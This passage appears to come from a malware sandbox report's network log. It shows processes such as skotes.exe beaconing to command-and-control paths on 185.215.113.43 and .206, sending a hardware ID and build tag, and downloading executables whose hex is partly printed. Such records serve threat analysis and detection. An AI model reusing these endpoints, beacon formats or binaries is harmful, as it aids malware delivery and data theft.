6b 8b d5 8c 6b 52 69 63 68 8a d5 8c 6b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e8 97 48 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 98 02 00 00 22 01 00 00 00 00 00 00 a0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 6a 00 00 04 00 00 83 e5 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPELHg"j@j@M$a$$ $b@.rsrc$r@.idata $t@ P+$v@sqwnkuayPtx@dlrscmkpj@.taggant0j"@
Nov 30, 2024 04:06:26.611191034 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:26.611202955 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:26.611342907 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:26.611355066 CET	496	IN	Data Raw: 62 80 38 6a d1 d5 b5 c3 af 09 53 2d 71 54 c0 97 89 62 13 51 e9 ac 88 8a 87 e0 13 6b bd 05 ac fa c7 2b b4 c7 e3 bf 14 47 9e ca ae 95 96 5d 4c 42 34 0c 66 8a 8b ac 8d 83 88 45 10 e7 8e 8d 85 83 d1 a8 74 b3 f5 d5 0e 5e 02 11 03 0c b5 bc b2 82 b7 07 Data Ascii: b8jS-qTbQk+G]LB4fEt^)w2;kvwt}$uV;J<+;+L@N31${5FsN3#l(}HdKKfYj1?KdLr6F6nfbserCngh
Nov 30, 2024 04:06:26.611491919 CET	1236	IN	Data Raw: 3b 9f 49 94 8c b9 07 f8 ee 38 37 b6 6d 7f c4 95 4a 37 25 8a 45 38 35 d2 09 1b 6b 90 bb bc 70 4e c7 d1 af bb 86 dc a4 f7 b6 9c 2f ad 00 aa 83 aa a9 bc 50 85 2d e8 d6 74 b8 2a fd 93 5f cc a3 a2 b9 31 0f 20 11 ce b8 bd 91 a5 b3 5e de cf 9d a7 41 05 Data Ascii: ;I87mJ7%E85kpN/P-t*_1 ^AUBw,G52O4'_2;X4LW'bz_s;gW%KD:DSGpo2Gj/<S6oVI`Sg:62(_<mcYk}27
Nov 30, 2024 04:06:26.611510038 CET	1236	IN	Data Raw: 88 a4 24 8d 83 84 43 2e fb bd 8c 83 87 06 94 03 c0 41 68 8f 2c 45 4e e4 b7 58 33 3f 3c 40 65 52 28 a5 99 8c 69 14 b7 96 71 26 07 eb 9e f0 23 7e c0 fb 2a c2 07 01 65 12 b7 38 60 89 ef 36 dc 74 59 0f 14 10 c5 f2 65 5d fa ad e0 8a 7e 4d fe a2 01 b5 Data Ascii: $C.Ah,ENX3?<@eR(iq&#~e8`6tYe]~MsBa]?j3\"(&p9+#'i<~lAM{>N\Xb8H~K:z^VvNvZ>9;Q$M Qwyj8r \cI#E&A
Nov 30, 2024 04:06:26.611521959 CET	1236	IN	Data Raw: cb f2 76 3e 7d 94 cc 88 22 f6 6e f6 ec d5 66 4e 1f dd 81 9d fe 55 3b 46 43 d6 69 38 64 dc d2 0d 7f 08 f3 d0 f6 55 92 a8 55 dd 0a 80 4b c5 d1 09 4c 1c db c6 d6 d6 fe 04 83 af 3d 48 ed 04 db 98 02 38 45 7e c0 f6 07 a9 3a 1a 43 98 31 bc 4e c6 c1 83 Data Ascii: v>}"nfNU;FCi8dUUKL=H8E~:C1N8*GDhS=WL@,eWVX=H<%}dF8.\|vF8VaOT8sZf&8E;$gF5%0CMDJG<(c8ENzx$K#OT3=
Nov 30, 2024 04:06:26.611532927 CET	1236	IN	Data Raw: 78 c2 ac b2 4c 02 53 0a b3 f8 ae a4 50 e5 b2 8a da 38 65 ee 57 b8 46 f6 4a 6c 39 a3 02 c4 b2 07 25 c5 ae d8 16 55 39 6e 3f 58 67 0f 0f 3e 34 09 3e f8 c2 9e 4f c5 4d 93 f2 3d 4c 41 66 ed 44 ad 86 c8 38 de d7 e3 cb 96 08 0a 43 06 4d e4 43 c2 c0 c6 Data Ascii: xLSP8eWFJl9%U9n?Xg>4>OM=LAfD8CMCW7xF$y,2&`{;kl<x3nR9~XDz.:38f@xGUD34{~3LxHD.Hel^\9DdbH3zO@mxB[,
Nov 30, 2024 04:06:26.611548901 CET	1236	IN	Data Raw: 8e ab 2b b4 bd a4 36 04 71 d9 36 87 78 95 2b e7 bd 35 8a 92 70 c6 3e 11 50 7c ad 13 ff 19 da aa 3e ca 5a c7 ba bc 51 34 f4 d9 72 6c bc 39 4c ca 3e cf 7a 06 1f 50 2b 5b da a6 35 84 62 68 af a6 bc 04 d6 0a 71 fc 38 8a da 3d b3 f2 cf 90 cb 8a ea 38 Data Ascii: +6q6x+5p>P\|>ZQ4rl9L>zP+[5bhq8=8s"ev#f+>L]eT~aCz?]<8(<38:!\|kevv"3wHsW+~EhP4DXev#\|X,4L?_2JhV?9<gzYl&>pJbjj
Nov 30, 2024 04:06:26.731328011 CET	1236	IN	Data Raw: 7b b2 38 48 3b ef 87 6e 6a a8 5c 46 05 2a 9f 6d 3b 3c 4e 45 26 c4 4a 19 f1 b6 6f 8e 87 b7 01 3b c4 7c 56 f6 08 cd e9 79 28 32 2f c4 2c b8 c9 a3 c0 59 25 70 45 91 55 44 51 3c 2e 3f 7f 54 e5 b3 7d ef 1a f5 c2 fe 96 37 22 c3 37 d2 b2 da 76 e5 89 7b Data Ascii: {8H;nj\F*m;<NE&Jo;\|Vy(2/,Y%pEUDQ<.?T}7"7v{x8IEmSFvk/n70VN=0v9xJW@<NH{IUE>1C"H\|ps,7xgtCCyQ3q_SVBUH'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49816	185.215.113.206	80	5500	C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 04:06:31.305932045 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 30, 2024 04:06:32.753941059 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 03:06:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 30, 2024 04:06:32.756517887 CET	412	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGCGDBGCAAEBFIECGHDG Host: 185.215.113.206 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 37 31 37 35 42 36 37 42 38 31 31 30 37 33 34 30 34 30 39 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 2d 2d 0d 0a Data Ascii: ------DGCGDBGCAAEBFIECGHDGContent-Disposition: form-data; name="hwid"C47175B67B81107340409------DGCGDBGCAAEBFIECGHDGContent-Disposition: form-data; name="build"drum------DGCGDBGCAAEBFIECGHDG--
Nov 30, 2024 04:06:33.224828959 CET	210	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 03:06:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49818	185.215.113.43	80	2312	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 04:06:32.219235897 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 30 34 38 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010482001&unit=246122658369
Nov 30, 2024 04:06:33.598859072 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 30 Nov 2024 03:06:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49822	185.215.113.16	80	2312	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 04:06:33.726385117 CET	55	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 30, 2024 04:06:35.109081030 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 30 Nov 2024 03:06:34 GMT Content-Type: application/octet-stream Content-Length: 922112 Last-Modified: Sat, 30 Nov 2024 03:03:02 GMT Connection: keep-alive ETag: "674a8066-e1200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5e 80 4a 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 62 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPEL^Jg"bw@pu_@@@d\|@u4@.text `.rdata@@.datalpH@.rsrc@@@.relocuv@B
Nov 30, 2024 04:06:35.109117985 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY
Nov 30, 2024 04:06:35.109131098 CET	1236	IN	Data Raw: b7 6c fd ff ff 8b ce e8 f7 ba 00 00 33 c9 c7 46 0c 01 00 00 00 89 0e 8b 03 8b 40 04 03 c7 39 88 98 fb ff ff 74 35 89 4d fc 51 8d 4d fc 51 8d 88 94 fb ff ff e8 2f 05 00 00 8b 03 8d 8f 98 fb ff ff 8b 40 04 03 c8 e8 c6 04 00 00 8b 03 8b 40 04 03 c7 Data Ascii: l3F@9t5MQMQ/@@ulIOkOu3_OO_`d<IvY\|#l)\DItv
Nov 30, 2024 04:06:35.109244108 CET	1236	IN	Data Raw: 7f 00 00 8d 8e 9c 00 00 00 e8 10 7f 00 00 8d 8e 8c 00 00 00 e8 05 7f 00 00 8d 4e 08 5e e9 00 00 00 00 56 57 8b f9 33 f6 8b 44 f7 04 85 c0 0f 85 4e 0d 04 00 46 83 fe 10 7c ee 5f 5e c3 53 56 8b f1 33 db 57 38 5e 09 0f 85 54 0d 04 00 38 5e 08 75 1c Data Ascii: N^VW3DNF\|_^SV3W8^T8^uNy8tQ~^_^[VN j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj
Nov 30, 2024 04:06:35.109255075 CET	496	IN	Data Raw: 00 5f 5e 5b c9 c2 08 00 49 eb 89 41 eb 86 8d 47 01 89 02 eb dc e8 5b 01 00 00 84 c0 74 0e 8b ca e8 50 01 00 00 84 c0 74 03 b0 01 c3 32 c0 c3 55 8b ec 51 51 56 8b f1 80 be 6d 01 00 00 00 8b 86 68 01 00 00 75 53 ff 70 04 e8 1e 09 00 00 8d 4d ff c7 Data Ascii: _^[IAG[tPt2UQQVmhuSpMEQMQPx$}dtmhuIEA^j@0I0uuUQQVW}EPEEPWNx8OEfx3
Nov 30, 2024 04:06:35.109298944 CET	1236	IN	Data Raw: 5f 5e 33 c0 5b 5d c2 04 00 b2 01 eb ed 55 8b ec 83 ec 1c 33 d2 42 53 56 57 8b c2 50 8d 50 01 89 55 fc e8 55 07 00 00 8b f8 85 ff 0f 84 c3 00 00 00 8d 4a ff 89 0d 28 15 4d 00 8b 4f 04 8b 31 66 83 7e 08 00 75 d3 8b 36 83 fe 20 74 05 83 fe 2b 75 c7 Data Ascii: _^3[]U3BSVWPPUUJ(MO1f~u6 t+u+3+fy4AEAEARUE{lMG3+DfxGuBAEESPEPEPWDMnwU%
Nov 30, 2024 04:06:35.109311104 CET	224	IN	Data Raw: 8b 5d fc ff 75 f4 8b 45 f8 ff 75 e4 ff 75 e0 53 50 ff 75 f0 57 e8 0f 04 00 00 85 c0 0f 89 08 ff ff ff e9 82 00 00 00 8b 41 04 6a 7f 59 66 39 48 08 0f 85 c7 04 04 00 8b 45 f4 48 4f 83 bd 54 ff ff ff 00 89 45 f4 0f 84 9e 02 04 00 80 bd 5d ff ff ff Data Ascii: ]uEuuSPuWAjYf9HEHOTE]ETpXEE;1uuuuSRu3SxMxl`MT
Nov 30, 2024 04:06:35.109319925 CET	1236	IN	Data Raw: e8 e6 01 00 00 8d 4d 9c e8 de 01 00 00 5f 8b c6 5e 5b c9 c3 83 e8 04 0f 84 ca 03 04 00 83 e8 01 0f 84 72 03 04 00 8b 55 f8 8b 5d fc 83 e8 05 0f 85 a7 fc ff ff e9 d3 fe ff ff 8b 41 04 6a 7f 59 66 39 48 08 0f 85 d4 03 04 00 83 7d f4 00 0f 85 82 fc Data Ascii: M_^[rU]AjYf9H}AjYf9HEE}xPG\|EIEE}`PGdE%}U]/EHOxE}E
Nov 30, 2024 04:06:35.109333038 CET	1236	IN	Data Raw: 04 00 a0 90 23 4d 00 a2 04 14 4d 00 a0 91 23 4d 00 88 44 24 12 8d 44 24 14 50 8d 84 24 3c 00 01 00 50 68 ff 7f 00 00 ff 35 18 14 4d 00 ff 15 68 c3 49 00 ff 74 24 14 b9 f0 13 4d 00 e8 59 40 00 00 8a 5c 24 11 ff 35 00 14 4d 00 68 18 14 4d 00 e8 be Data Ascii: #MM#MD$D$P$<Ph5MhIt$MY@\$5MhMa\|$sY4=MMuW0M=MuD$8PIL$(m_^[]U4SVWj<Ihj8I54Ijc5X
Nov 30, 2024 04:06:35.109545946 CET	1236	IN	Data Raw: 49 00 e8 90 1a 02 00 59 59 85 c0 75 3e 89 1d 00 14 4d 00 38 5d 0b 75 0a c7 05 00 14 4d 00 03 00 00 00 8d 45 f0 50 8d 4d 90 e8 c5 00 00 00 8d 45 f0 b9 18 14 4d 00 50 e8 fa 78 00 00 8d 45 f0 83 ee 02 50 8d 4d 90 e8 a8 00 00 00 39 1d 1c 14 4d 00 0f Data Ascii: IYYu>M8]uMEPMEMPxEPM9MM3NQjWJ:u3]@ESPEPW@Mt~5EPML?CESjPWf@MKEPM#;\|M"hM+M@_^[
Nov 30, 2024 04:06:35.229140997 CET	1236	IN	Data Raw: 33 db a3 94 23 4d 00 56 b8 34 cc 49 00 66 89 1d 90 23 4d 00 57 88 1d 92 23 4d 00 89 1d 98 23 4d 00 89 1d 9c 23 4d 00 89 1d a0 23 4d 00 89 1d a4 23 4d 00 a3 a8 23 4d 00 89 1d ac 23 4d 00 89 1d b0 23 4d 00 89 1d b4 23 4d 00 c7 05 b8 23 4d 00 44 c9 Data Ascii: 3#MV4If#MW#M#M#M#M#M#M#M#M#M#MDI#M#M#M#M#M#M#M#M#M<I#M#M#M#MfNtL$(>T$(0h(IL$,D$(#MPL$tL$mqD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49839	185.215.113.43	80	2312	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 04:06:39.402904987 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 30 34 38 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010483001&unit=246122658369
Nov 30, 2024 04:06:40.788069963 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 30 Nov 2024 03:06:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49840	185.215.113.16	80	2312	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 04:06:40.915993929 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 30, 2024 04:06:42.311624050 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 30 Nov 2024 03:06:42 GMT Content-Type: application/octet-stream Content-Length: 2765824 Last-Modified: Sat, 30 Nov 2024 03:03:28 GMT Connection: keep-alive ETag: "674a8080-2a3400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 b9 3a 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$* `@ :`Ui` @ @.rsrc`2@.idata 8@xbmfzvhb)):@ztggrlpz *@.taggant@"*@
Nov 30, 2024 04:06:42.311678886 CET	124	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:42.311949015 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:42.312030077 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:42.312051058 CET	248	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:42.312231064 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:42.312284946 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:42.312304974 CET	248	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:42.312903881 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:42.312973022 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:42.432287931 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: -'EJbI\|/)h:d2dVMX+Tb,9NS;Li

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49865	34.107.221.82	80	8136	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 04:06:46.446964979 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 30, 2024 04:06:47.579356909 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 29 Nov 2024 08:39:26 GMT Age: 66441 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49879	185.215.113.43	80	2312	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 04:06:49.447583914 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 30 34 38 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010484001&unit=246122658369
Nov 30, 2024 04:06:50.884684086 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 30 Nov 2024 03:06:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49881	34.107.221.82	80	8136	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 04:06:49.761286974 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 30, 2024 04:06:50.891401052 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 29 Nov 2024 05:40:28 GMT Age: 77182 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
